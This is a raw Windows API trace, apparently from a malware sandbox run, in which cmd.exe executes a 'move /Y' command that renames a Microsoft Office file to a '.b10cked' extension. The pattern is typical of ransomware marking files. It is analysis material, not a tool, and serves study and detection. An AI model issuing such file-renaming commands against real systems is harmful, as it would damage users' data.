lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x1, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x1, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x0, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x40, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x40, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x40, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.345] RegCloseKey (hKey=0x40) returned 0x0 [0162.345] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae8b4 | out: phkResult=0x1ae8b4*=0x40) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x40, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, 
lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x1, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x1, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x0, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x9, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x9, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x9, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.345] RegCloseKey (hKey=0x40) returned 0x0 [0162.345] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.345] srand (_Seed=0x5b886384) [0162.345] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"" [0162.345] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"" [0162.345] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.346] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.346] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.346] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.346] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.346] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.346] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.346] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.346] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.346] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.346] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.346] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.346] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.346] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.346] GetEnvironmentStringsW () returned 0x352368* [0162.346] FreeEnvironmentStringsW (penv=0x352368) returned 1 [0162.346] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.346] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.346] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.346] _wcsicmp (_String1="KEYS", 
_String2="ERRORLEVEL") returned 6 [0162.346] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.346] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.347] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.347] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.347] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.347] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.347] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af680 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.347] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af680, lpFilePart=0x1af67c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af67c*="Desktop") returned 0x18 [0162.347] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.347] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af3fc | out: lpFindFileData=0x1af3fc) returned 0x3509f8 [0162.347] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0162.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af3fc | out: lpFindFileData=0x1af3fc) returned 0x3509f8 [0162.347] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0162.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af3fc | out: lpFindFileData=0x1af3fc) returned 0x3509f8 [0162.347] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0162.348] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.348] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.348] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.348] 
GetEnvironmentStringsW () returned 0x350218* [0162.348] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0162.348] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.348] GetConsoleOutputCP () returned 0x1b5 [0162.349] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.349] GetUserDefaultLCID () returned 0x409 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af7c0, cchData=128 | out: lpLCData="0") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af7c0, cchData=128 | out: lpLCData="0") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af7c0, cchData=128 | out: lpLCData="1") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, 
cchData=8 | out: lpLCData=".") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.350] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.350] GetConsoleTitleW (in: lpConsoleTitle=0x340938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.351] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.351] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.351] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.351] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.352] _wcsicmp (_String1="move", _String2=")") returned 68 [0162.352] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0162.352] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0162.352] _wcsicmp (_String1="IF", _String2="move") returned -4 [0162.352] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0162.352] _wcsicmp (_String1="REM", _String2="move") returned 5 [0162.352] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0162.356] GetConsoleTitleW (in: lpConsoleTitle=0x1af4b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.356] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0162.356] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0162.356] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0162.356] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0162.356] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0162.356] _wcsicmp (_String1="move", _String2="CD") returned 10 [0162.356] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0162.356] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0162.356] _wcsicmp (_String1="move", _String2="REN") returned -5 [0162.356] _wcsicmp 
(_String1="move", _String2="ECHO") returned 8 [0162.356] _wcsicmp (_String1="move", _String2="SET") returned -6 [0162.356] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0162.356] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0162.356] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0162.356] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0162.356] _wcsicmp (_String1="move", _String2="MD") returned 11 [0162.356] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0162.356] _wcsicmp (_String1="move", _String2="RD") returned -5 [0162.356] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0162.356] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0162.356] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0162.356] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0162.356] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0162.357] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0162.357] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0162.357] _wcsicmp (_String1="move", _String2="VER") returned -9 [0162.357] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0162.357] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0162.357] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0162.357] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0162.357] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0162.357] _wcsicmp (_String1="move", _String2="START") returned -6 [0162.357] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0162.357] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0162.357] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0162.497] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.497] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.497] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af274, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af26c, 
lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af26c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp 
(_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0162.499] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0162.499] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0162.499] _wcsicmp (_String1="XLINTL~2.TRX", _String2=".") returned 74 [0162.499] _wcsicmp (_String1="XLINTL~2.TRX", _String2="..") returned 74 [0162.499] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl~2.trx")) returned 0x2020 [0162.499] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.499] SetErrorMode (uMode=0x0) returned 0x0 [0162.499] SetErrorMode (uMode=0x1) returned 0x0 [0162.500] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x1aebfc, lpFilePart=0x1aebe4 | 
out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", lpFilePart=0x1aebe4*="XLINTL~2.TRX") returned 0x3c [0162.500] SetErrorMode (uMode=0x0) returned 0x1 [0162.500] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0162.500] _wcsicmp (_String1="XLINTL~2.TRX", _String2=".") returned 74 [0162.500] _wcsicmp (_String1="XLINTL~2.TRX", _String2="..") returned 74 [0162.500] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl~2.trx")) returned 0x2020 [0162.500] SetErrorMode (uMode=0x0) returned 0x0 [0162.500] SetErrorMode (uMode=0x1) returned 0x0 [0162.500] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x1af078, lpFilePart=0x1aee10 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", lpFilePart=0x1aee10*="XLINTL~2.TRX") returned 0x3c [0162.500] SetErrorMode (uMode=0x0) returned 0x1 [0162.500] SetErrorMode (uMode=0x0) returned 0x0 [0162.500] SetErrorMode (uMode=0x1) returned 0x0 [0162.500] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1af280, lpFilePart=0x1aee10 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked", lpFilePart=0x1aee10*="XLINTL32.REST.trx_dll.b10cked") returned 0x4d [0162.500] SetErrorMode (uMode=0x0) returned 0x1 [0162.500] SetLastError (dwErrCode=0x0) [0162.500] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.rest.trx_dll.b10cked")) returned 0xffffffff 
[0162.501] GetLastError () returned 0x2 [0162.501] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x1ae78c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae78c) returned 0x352138 [0162.501] FindNextFileW (in: hFindFile=0x352138, lpFindFileData=0x1ae78c | out: lpFindFileData=0x1ae78c) returned 0 [0162.501] GetLastError () returned 0x12 [0162.501] FindClose (in: hFindFile=0x352138 | out: hFindFile=0x352138) returned 1 [0162.503] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x351cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351cc8) returned 0x352138 [0162.503] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1aea24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0162.503] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x1aea24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0162.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.rest.trx_dll")) returned 0x2020 [0162.503] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0162.504] FindClose (in: hFindFile=0x352138 | out: hFindFile=0x352138) returned 1 [0162.504] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ae9d8 | out: _Buffer=" 1") returned 9 [0162.504] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.504] GetFileType (hFile=0x7) returned 0x2 [0162.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.504] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ae964 | out: lpMode=0x1ae964) returned 1 [0162.504] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae998 | out: lpConsoleScreenBufferInfo=0x1ae998) returned 1 [0162.505] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0162.505] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ae9d8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0162.505] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ae9bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ae9bc*=0x1a) returned 1 [0162.505] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.505] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.506] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.506] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.506] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.506] SetConsoleInputExeNameW () returned 0x1 [0162.506] GetConsoleOutputCP () returned 0x1b5 [0162.506] 
